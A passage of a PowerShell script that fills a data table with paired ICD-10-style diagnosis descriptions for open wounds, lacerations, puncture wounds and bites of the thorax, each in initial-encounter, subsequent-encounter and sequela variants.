thoracic cavity","Unspecified open wound of left back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified back wall of thorax without penetration into thoracic cavity","Unspecified open wound of unspecified back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified back wall of thorax without penetration into thoracic cavity","Unspecified open wound of unspecified back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified back wall of thorax without penetration into thoracic cavity","Unspecified open wound of unspecified back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right back wall of thorax without penetration into thoracic cavity","Laceration without foreign body of right back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right back wall of thorax without penetration into thoracic cavity","Laceration without foreign body of right back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right back wall of thorax without penetration into thoracic cavity","Laceration without foreign body of right back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left back wall of thorax without penetration into thoracic cavity","Laceration without foreign body of left back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left back wall of thorax without penetration into thoracic cavity","Laceration without foreign body of left back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left back wall of thorax without penetration into thoracic cavity","Laceration without foreign body of left back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified back wall of thorax without penetration into thoracic cavity","Laceration without foreign body of unspecified back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified back wall of thorax without penetration into thoracic cavity","Laceration without foreign body of unspecified back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified back wall of thorax without penetration into thoracic cavity","Laceration without foreign body of unspecified back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right back wall of thorax without penetration into thoracic cavity","Laceration with foreign body of right back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right back wall of thorax without penetration into thoracic cavity","Laceration with foreign body of right back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right back wall of thorax without penetration into thoracic cavity","Laceration with foreign body of right back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left back wall of thorax without penetration into thoracic cavity","Laceration with foreign body of left back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left back wall of thorax without penetration into thoracic cavity","Laceration with foreign body of left back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left back wall of thorax without penetration into thoracic cavity","Laceration with foreign body of left back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified back wall of thorax without penetration into thoracic cavity","Laceration with foreign body of unspecified back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified back wall of thorax without penetration into thoracic cavity","Laceration with foreign body of unspecified back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified back wall of thorax without penetration into thoracic cavity","Laceration with foreign body of unspecified back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right back wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of right back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right back wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of right back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right back wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of right back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left back wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of left back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left back wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of left back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left back wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of left back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified back wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of unspecified back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified back wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of unspecified back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified back wall of thorax without penetration into thoracic cavity","Puncture wound without foreign body of unspecified back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right back wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of right back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right back wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of right back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right back wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of right back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left back wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of left back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left back wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of left back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left back wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of left back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified back wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of unspecified back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified back wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of unspecified back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified back wall of thorax without penetration into thoracic cavity","Puncture wound with foreign body of unspecified back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right back wall of thorax without penetration into thoracic cavity","Open bite of right back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right back wall of thorax without penetration into thoracic cavity","Open bite of right back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right back wall of thorax without penetration into thoracic cavity","Open bite of right back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left back wall of thorax without penetration into thoracic cavity","Open bite of left back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left back wall of thorax without penetration into thoracic cavity","Open bite of left back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left back wall of thorax without penetration into thoracic cavity","Open bite of left back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified back wall of thorax without penetration into thoracic cavity","Open bite of unspecified back wall of thorax without penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified back wall of thorax without penetration into thoracic cavity","Open bite of unspecified back wall of thorax without penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified back wall of thorax without penetration into thoracic cavity","Open bite of unspecified back wall of thorax without penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right front wall of thorax with penetration into thoracic cavity","Unspecified open wound of right front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right front wall of thorax with penetration into thoracic cavity","Unspecified open wound of right front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right front wall of thorax with penetration into thoracic cavity","Unspecified open wound of right front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left front wall of thorax with penetration into thoracic cavity","Unspecified open wound of left front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left front wall of thorax with penetration into thoracic cavity","Unspecified open wound of left front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left front wall of thorax with penetration into thoracic cavity","Unspecified open wound of left front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified front wall of thorax with penetration into thoracic cavity","Unspecified open wound of unspecified front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified front wall of thorax with penetration into thoracic cavity","Unspecified open wound of unspecified front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified front wall of thorax with penetration into thoracic cavity","Unspecified open wound of unspecified front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right front wall of thorax with penetration into thoracic cavity","Laceration without foreign body of right front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right front wall of thorax with penetration into thoracic cavity","Laceration without foreign body of right front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right front wall of thorax with penetration into thoracic cavity","Laceration without foreign body of right front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left front wall of thorax with penetration into thoracic cavity","Laceration without foreign body of left front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left front wall of thorax with penetration into thoracic cavity","Laceration without foreign body of left front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left front wall of thorax with penetration into thoracic cavity","Laceration without foreign body of left front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified front wall of thorax with penetration into thoracic cavity","Laceration without foreign body of unspecified front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified front wall of thorax with penetration into thoracic cavity","Laceration without foreign body of unspecified front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified front wall of thorax with penetration into thoracic cavity","Laceration without foreign body of unspecified front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right front wall of thorax with penetration into thoracic cavity","Laceration with foreign body of right front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right front wall of thorax with penetration into thoracic cavity","Laceration with foreign body of right front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right front wall of thorax with penetration into thoracic cavity","Laceration with foreign body of right front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left front wall of thorax with penetration into thoracic cavity","Laceration with foreign body of left front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left front wall of thorax with penetration into thoracic cavity","Laceration with foreign body of left front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left front wall of thorax with penetration into thoracic cavity","Laceration with foreign body of left front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified front wall of thorax with penetration into thoracic cavity","Laceration with foreign body of unspecified front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified front wall of thorax with penetration into thoracic cavity","Laceration with foreign body of unspecified front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified front wall of thorax with penetration into thoracic cavity","Laceration with foreign body of unspecified front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right front wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of right front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right front wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of right front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right front wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of right front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left front wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of left front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left front wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of left front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left front wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of left front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified front wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of unspecified front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified front wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of unspecified front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified front wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of unspecified front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right front wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of right front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right front wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of right front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right front wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of right front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left front wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of left front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left front wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of left front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left front wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of left front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified front wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of unspecified front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified front wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of unspecified front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified front wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of unspecified front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right front wall of thorax with penetration into thoracic cavity","Open bite of right front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right front wall of thorax with penetration into thoracic cavity","Open bite of right front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right front wall of thorax with penetration into thoracic cavity","Open bite of right front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left front wall of thorax with penetration into thoracic cavity","Open bite of left front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left front wall of thorax with penetration into thoracic cavity","Open bite of left front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left front wall of thorax with penetration into thoracic cavity","Open bite of left front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified front wall of thorax with penetration into thoracic cavity","Open bite of unspecified front wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified front wall of thorax with penetration into thoracic cavity","Open bite of unspecified front wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified front wall of thorax with penetration into thoracic cavity","Open bite of unspecified front wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right back wall of thorax with penetration into thoracic cavity","Unspecified open wound of right back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right back wall of thorax with penetration into thoracic cavity","Unspecified open wound of right back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right back wall of thorax with penetration into thoracic cavity","Unspecified open wound of right back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left back wall of thorax with penetration into thoracic cavity","Unspecified open wound of left back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left back wall of thorax with penetration into thoracic cavity","Unspecified open wound of left back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left back wall of thorax with penetration into thoracic cavity","Unspecified open wound of left back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified back wall of thorax with penetration into thoracic cavity","Unspecified open wound of unspecified back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified back wall of thorax with penetration into thoracic cavity","Unspecified open wound of unspecified back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified back wall of thorax with penetration into thoracic cavity","Unspecified open wound of unspecified back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right back wall of thorax with penetration into thoracic cavity","Laceration without foreign body of right back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right back wall of thorax with penetration into thoracic cavity","Laceration without foreign body of right back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right back wall of thorax with penetration into thoracic cavity","Laceration without foreign body of right back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left back wall of thorax with penetration into thoracic cavity","Laceration without foreign body of left back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left back wall of thorax with penetration into thoracic cavity","Laceration without foreign body of left back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left back wall of thorax with penetration into thoracic cavity","Laceration without foreign body of left back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified back wall of thorax with penetration into thoracic cavity","Laceration without foreign body of unspecified back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified back wall of thorax with penetration into thoracic cavity","Laceration without foreign body of unspecified back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified back wall of thorax with penetration into thoracic cavity","Laceration without foreign body of unspecified back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right back wall of thorax with penetration into thoracic cavity","Laceration with foreign body of right back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right back wall of thorax with penetration into thoracic cavity","Laceration with foreign body of right back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right back wall of thorax with penetration into thoracic cavity","Laceration with foreign body of right back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left back wall of thorax with penetration into thoracic cavity","Laceration with foreign body of left back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left back wall of thorax with penetration into thoracic cavity","Laceration with foreign body of left back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left back wall of thorax with penetration into thoracic cavity","Laceration with foreign body of left back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified back wall of thorax with penetration into thoracic cavity","Laceration with foreign body of unspecified back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified back wall of thorax with penetration into thoracic cavity","Laceration with foreign body of unspecified back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified back wall of thorax with penetration into thoracic cavity","Laceration with foreign body of unspecified back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right back wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of right back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right back wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of right back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right back wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of right back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left back wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of left back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left back wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of left back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left back wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of left back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified back wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of unspecified back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified back wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of unspecified back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified back wall of thorax with penetration into thoracic cavity","Puncture wound without foreign body of unspecified back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right back wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of right back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right back wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of right back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right back wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of right back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left back wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of left back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left back wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of left back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left back wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of left back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified back wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of unspecified back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified back wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of unspecified back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified back wall of thorax with penetration into thoracic cavity","Puncture wound with foreign body of unspecified back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of right back wall of thorax with penetration into thoracic cavity","Open bite of right back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right back wall of thorax with penetration into thoracic cavity","Open bite of right back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of right back wall of thorax with penetration into thoracic cavity","Open bite of right back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of left back wall of thorax with penetration into thoracic cavity","Open bite of left back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left back wall of thorax with penetration into thoracic cavity","Open bite of left back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of left back wall of thorax with penetration into thoracic cavity","Open bite of left back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified back wall of thorax with penetration into thoracic cavity","Open bite of unspecified back wall of thorax with penetration into thoracic cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified back wall of thorax with penetration into thoracic cavity","Open bite of unspecified back wall of thorax with penetration into thoracic cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of unspecified back wall of thorax with penetration into thoracic cavity","Open bite of unspecified back wall of thorax with penetration into thoracic cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified part of thorax","Unspecified open wound of unspecified part of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified part of thorax","Unspecified open wound of unspecified part of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified part of thorax","Unspecified open wound of unspecified part of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified part of thorax","Laceration without foreign body of unspecified part of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified part of thorax","Laceration without foreign body of unspecified part of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified part of thorax","Laceration without foreign body of unspecified part of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified part of thorax","Laceration with foreign body of unspecified part of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified part of thorax","Laceration with foreign body of unspecified part of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified part of thorax","Laceration with foreign body of unspecified part of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified part of thorax","Puncture wound without foreign body of unspecified part of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified part of thorax","Puncture wound without foreign body of unspecified part of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified part of thorax","Puncture wound without foreign body of unspecified part of thorax, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified part of thorax","Puncture wound with foreign body of unspecified part of thorax, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified part of thorax","Puncture wound with foreign body of unspecified part of thorax, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified part of thorax","Puncture wound with foreign body of unspecified part of 